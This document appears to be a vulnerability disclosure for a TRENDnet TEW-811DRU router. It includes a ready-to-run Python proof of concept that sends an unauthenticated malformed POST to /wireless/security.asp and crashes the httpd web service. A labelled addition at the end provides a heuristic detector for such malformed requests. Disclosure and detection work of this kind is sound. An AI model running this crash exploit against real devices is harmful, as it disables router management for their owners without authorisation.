# Overview
* Type: memory corruption
* Supplier: TRENDNet (https://www.trendnet.com/)
* Product: TRENDNet TEW-811DRU (Version v1.0R)
* Firmware download: https://downloads.trendnet.com/tew-811dru/firmware/fw_tew-811dru_v1(x.x.x.x).zip
* Affected version: latest version x.x.x.x
* Bug URL: http://192.168.10.1/wireless/security.asp
# Description
The web program 'httpd' processes all incoming requests. A single malformed request can make 'httpd' crash. The vulnerability is easy to exploit because it requires neither authentication nor authorization. It allows a malicious attacker to crash the router and has the potential to control the router.
# Reproduce and PoC
## Steps to Reproduce
I have put the PoC code in the next section; configure one parameter and execute it, and the device's web service will crash. The parameter is as follows:
- device_web_ip: web IP address of the target device.

After executing the PoC script, you will find that the device's web service has crashed: you can try to visit the device's web interface through a browser, or use telnet ('telnet device_web_ip 80') to check.
## Proof of Concept
Below is the PoC, written in Python 3. Save the code to a script (exp.py) and execute it.
```
import requests,socket
import re
import time
from urllib.parse import urlencode
device_web_ip = '192.168.10.1'
request = {'HEAD':
{'Host': b'Z',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': b',\x80gpsiation//xm',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': b'enc\xbc\xbc\xbc',
'Content-Length': '1209',
'Origin': 'http://x.x.x.x:8080',
'Connection': 'keep-alive',
'Referer': 'http://x.x.x.x:8080/wireless/security.asp',
'Cookie': 'expandable=3c',
'Upgrade-Insecure-Requests': b'\x1d2'
},
'PARAM':
{b'ecOe': b'/wireless/srcuri\x81\x80.asp',
b'\x86od}': 'Qy4zq80U9FFhnKc0BBTA',
'wl_wps_mode': b'd\x10saDte\x80',
b'\x96\x96': b' 5',
'wl_bssid': b'SS',
'security_mode': b'OO:E',
b'\x88l\x88l_eu_aZ': 0,
'wl_auth_mode': 'none',
b'cc@@zw(': 'enabled',
'wl_akm': b'',
'wl_akm_wpa': b'b\x85nd',
'wl_akm_psk': 'disabled',
'wl_akm_wpa2': b'disniled',
'wl_akm_psk2': b'\xd3isabled',
'wl_wai_cert_index': '',
'wl_wai_cert_status': '',
b'\x00\xffak\xffakvv_w': 'disabled',
b'wkm_wl_akm_wapi\x05\xff\xff': 'disabled',
'wl_key': 2,
b'\x01': 'abcde',
b'wl{k@{': 'abcdefabcdefe',
b'Sk': b'\x01\x8b\x00',
b'7l_+ey': b'a\x80\x00\x00\x01\x8f',
'wl_macmode': b'a\x1c(\x1a\xc2\xba\x04\x00al',
'wl_maclist': 48,
b'\x7fmmAc3t0t0': '00:0c:29:d9:40:fe',
b'wl_mac\xc3\x8f?\xc3\x86\x045\x00\x80\x1b\xc3\x88\xc3\x96\xc3\xa4S\xc2\x96\xc2\x96$\x00Dh\xc3\xb4\xc3\x9flis\xc3\x8b\x0bX>\t\xc2\xaaQ\x03': '00:0c:29:d9:40:ff',
b'glFqacKist2': b'2:0c\x8029::@BJ40!fd',
b'lmaylistaclma': '',
'wl_maclist4': '',
'wl_maclist5': b'',
b'wleAaclb\x7fg': b'',
'wl_maclist7': b'',
b'l_++++wlP++++++*+': '',
'wl_maclist10': b'',
'wl_maclist11': b'',
b'w\xff\xff\xee\xff\x86ist\x80\x002': b'',
b'wl_wlcl\x05\xff\xff\x053': '',
b'hl@\x81B_\x7f\xff\x00\xff14': b'',
b'w@_maclis': '',
'wl_maclist16': b'',
b'wU_maczist17': b'',
'wl_maclist18': b'',
'wl_maclist19': b'',
b'w\xc2\x98\x0b$jl\x87mlym!cw\xc2\x98\x0b$jl\x87mlym!c\x9ai': b'',
b'w|\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1': b'',
b'a\x00\x00\x02\x00': '',
'wl_maclist23': '',
'wl_maclist24': b'',
b'\xa9\x14\twl_maclis\xa9\x14\twl_maclist2': '',
'wl_maclist26': b'',
'wl_maclist27': '',
'wl_maclist28': '',
b'wl_l_m\xba\xba\xba\xba\xba\xba': b'',
b'l\xff\xff\xfd\xff\xff': b'',
'wl_maclist31': b'',
b'J': b'',
b'wl_macli\xfft\x00\x02': b'',
'wl_maclist34': b'',
'wl_maclist35': '',
b'\x8dlTmaclist36': '',
'wl_maclist37': '',
'wl_maclist38': '',
'wl_maclist39': '',
'wl_maclist40': '',
b'sl_maclicl': '',
b'\x90l': b'',
b'wW_maclist4\xb3': '',
'wl_maclist44': b'',
'wl_maclist45': '',
'wl_maclist46': b'',
'wl_maclist47': b'',
b'\x00\x08\x7f': 'Apply',
'wan_apply': '<!--#tr id=',
'mg.alert.7': '',
'wl_key4': b'Q',
b'alg.alg.05': b'',
'wl_maclist15': b'',
'expandable': b'',
b'\xff\xff\xff\xff45': 4
},
'ATTR':
{'URL': 'http://{}/wireless/security.asp'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
    r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5)
    print('Finish attack, to check web state.')
except Exception as e:
    print('error:{}'.format(e))
```
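
A defensive check, added here and not part of the original report: it flags the two kinds of malformed fields visible in the PoC request, namely raw non-printable bytes in header values and form parameter names that are not plain identifiers. The report does not say which field triggers the crash, so this is a heuristic filter (for example in front of the management interface or over captured traffic); the function name, the allowed-name pattern and both sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumption: legitimate form fields use identifier-style names,
# such as wl_auth_mode or mg.alert.7 seen in the PoC parameters.
SAFE_NAME = re.compile(rb"[A-Za-z0-9_.]+")
PRINTABLE = re.compile(rb"[\x20-\x7e]*")


def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request; an empty list means clean."""
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    # Skip the request line, then check every header value byte by byte.
    for line in head.split(b"\r\n")[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("header line without colon")
            continue
        if not PRINTABLE.fullmatch(value.strip()):
            findings.append("non-printable bytes in header " + name.decode("latin-1"))
    # Percent-decode each form parameter name and compare to the allowed pattern.
    for pair in body.split(b"&"):
        if not pair:
            continue
        key = unquote_to_bytes(pair.partition(b"=")[0].replace(b"+", b" "))
        if not SAFE_NAME.fullmatch(key):
            findings.append("unexpected parameter name " + repr(key))
    return findings


# Constructed sample requests (not captured traffic).
CLEAN = (b"POST /wireless/security.asp HTTP/1.1\r\n"
         b"Host: 192.168.10.1\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
         b"wl_auth_mode=none&wl_key=2&mg.alert.7=")
MALFORMED = (b"POST /wireless/security.asp HTTP/1.1\r\n"
             b"Host: Z\r\n"
             b"Content-Type: enc\xbc\xbc\xbc\r\n\r\n"
             b"wl_auth_mode=none&%86od%7D=x&%00%08%7F=Apply")

if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("malformed", MALFORMED)):
        print(label, inspect_request(req))
```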